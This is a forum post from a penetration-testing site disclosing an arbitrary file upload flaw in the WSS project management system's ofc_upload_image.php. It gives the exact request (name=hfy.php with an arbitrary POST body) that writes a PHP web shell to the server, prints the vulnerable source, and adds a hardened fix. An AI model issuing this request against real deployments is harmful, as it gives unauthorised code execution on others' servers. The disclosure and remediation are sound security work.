China Network Penetration Testing Alliance

Title: WSS project management system POST get shell

Author: admin    Time: 2013-2-23 12:38
POSTing data to the vulnerable file makes it save a file with any extension.
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php   (hfy.php is the file name)

POST arbitrary data
Saved location: http://localhost/chart/tmp-upload-images/hfy.php
The latest WSS release still ships the vulnerable file; even the paid edition has it, as does the demo deployed on the Sina app store.

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*
print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// only basename() is applied to the URL value: the extension is never checked,
// so a name such as hfy.php is accepted as-is
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// the raw request body is written to disk unchanged, with no
// authentication and no check that it is actually an image
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is a mess. How to fix it: add permission checks, extension validation and the like; do it yourself.
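One way to apply the fix described above to the $_GET['name'] / raw-POST branch of ofc_upload_image.php, as an added example that is not the project's code and was not part of the original post. It assumes a $_SESSION['user_id'] marker for logged-in users and that tmp-upload-images/ is served with script execution disabled; both are assumptions, not details from the page.

```php
<?php
// Added example: hardened replacement for the $_GET['name'] / raw-POST branch.
// Assumed (not in the original): $_SESSION['user_id'] marks a logged-in user, and
// tmp-upload-images/ is served with script execution disabled.
session_start();

// 1. Permission check: only authenticated users may save chart images.
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('forbidden');
}

// 2. Raw body (replaces $HTTP_RAW_POST_DATA, removed in PHP 7) with a size cap.
$max  = 2 * 1024 * 1024;
$body = file_get_contents('php://input', false, null, 0, $max + 1);
if ($body === false || strlen($body) > $max) {
    http_response_code(413);
    exit('image too large');
}

// 3. Content check: the chart export is a PNG, so require the PNG signature and
//    a decodable image; arbitrary script text fails here regardless of the name.
if (strncmp($body, "\x89PNG\r\n\x1a\n", 8) !== 0 || @getimagesizefromstring($body) === false) {
    http_response_code(415);
    exit('not a PNG image');
}

// 4. Extension check on the client name, but the file is stored under a
//    server-generated name so the URL value never reaches the filesystem.
$name = isset($_GET['name']) ? $_GET['name'] : '';
if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.png\z/', $name)) {
    http_response_code(400);
    exit('invalid file name');
}
$stored = bin2hex(random_bytes(16)) . '.png';

// 5. Fixed directory, created without the original's world-writable 0777.
$dir = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
    http_response_code(500);
    exit('cannot create upload directory');
}
if (file_put_contents($dir . $stored, $body, LOCK_EX) === false) {
    http_response_code(500);
    exit('write failed');
}
echo 'Saved chart image as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
```

With this in place the request shown above (name=hfy.php with an arbitrary body) is rejected twice, first on the extension pattern and then on the PNG content check, and a legitimate chart export is stored under a name the client did not choose.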





Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2